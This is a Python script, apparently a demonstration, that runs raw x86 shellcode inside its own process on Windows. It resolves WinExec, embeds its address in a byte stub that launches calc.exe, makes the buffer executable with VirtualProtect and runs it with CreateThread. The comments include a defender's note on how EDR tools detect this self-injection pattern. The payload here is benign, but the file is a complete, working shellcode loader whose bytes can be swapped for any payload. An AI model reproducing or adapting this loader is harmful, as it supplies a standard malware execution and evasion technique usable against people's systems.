from ctypes import *
import sys

# Demonstration shellcode runner: resolves WinExec in the current process,
# patches its address into a small stub, marks the stub's buffer executable and
# runs it on a new thread. Windows-only (windll). The stub embeds the address as
# a 4-byte immediate, so this looks 32-bit-only; note that ctypes' default int
# return type would also truncate GetProcAddress's result on a 64-bit interpreter
# -- confirm the interpreter bitness before reusing.
# Defender's note: VirtualProtect(..., PAGE_EXECUTE_READWRITE) on a non-image
# (heap) buffer followed by CreateThread with a start address inside that buffer
# is the textbook self-injection sequence most EDR / ETW-based rules alert on.
hmodule = windll.kernel32.LoadLibraryA("kernel32.dll".encode())
addressWinExec = windll.kernel32.GetProcAddress(hmodule,"WinExec".encode())
print("Addresse de WinExec : "+str(hex(addressWinExec)))

# Split the address into its four bytes most-significant first, then reverse so
# the stub's immediate operand is little-endian as x86 expects.
bytesListe = [addressWinExec >> i & 0xff for i in (24,16,8,0)]
bytesListe.reverse()
addressWinExecBytes = b''
if sys.version_info<=(3,0):
    # Python 2: b'' is a str, so chr() concatenation yields the byte string.
    for byte in bytesListe:
        addressWinExecBytes+=chr(byte)
else:
    addressWinExecBytes = bytes(bytesListe)

# Stub layout: a short jump over the embedded WinExec address, followed by the
# call sequence that presumably hands the trailing ASCII path
# (C:\WINDOWS\system32\calc.exe) to WinExec as its command line.
shellcode = b'\xEB\x08\xBE'
shellcode+=addressWinExecBytes
shellcode+=b'\xFF\xD6\xC3\x31\xC0\x50\xE8\xF0\xFF\xFF\xFF\x43\x3A\x5C\x57\x49\x4E\x44\x4F\x57\x53\x5C\x73\x79\x73\x74\x65\x6D\x33\x32\x5C\x63\x61\x6C\x63\x2E\x65\x78\x65'
print("Shellcode ["+str(len(shellcode))+" bytes]:"+str(shellcode))

# c_char_p points at the bytes object's own buffer; that interpreter-owned
# memory is what gets re-protected and executed below.
pShellcode = c_char_p(shellcode)
ThreadID = c_int()
PAGE_EXECUTE_READWRITE = 0x40
OldVirtualProtect = c_int()
CreateThread = windll.kernel32.CreateThread
VirtualProtect = windll.kernel32.VirtualProtect
# Make the buffer RWX; the previous protection is written into OldVirtualProtect.
res = VirtualProtect(pShellcode,len(shellcode),PAGE_EXECUTE_READWRITE,pointer(OldVirtualProtect))
print("VirtualProtect resultat :"+str(res))
# Thread start address is the buffer itself, so the new thread runs the stub.
res = CreateThread(None,0,pShellcode,None,0,pointer(ThreadID))
print("Thread resultat :"+str(res))
# Blocks on stdin, presumably to keep the process (and the thread) alive.
input(">>>")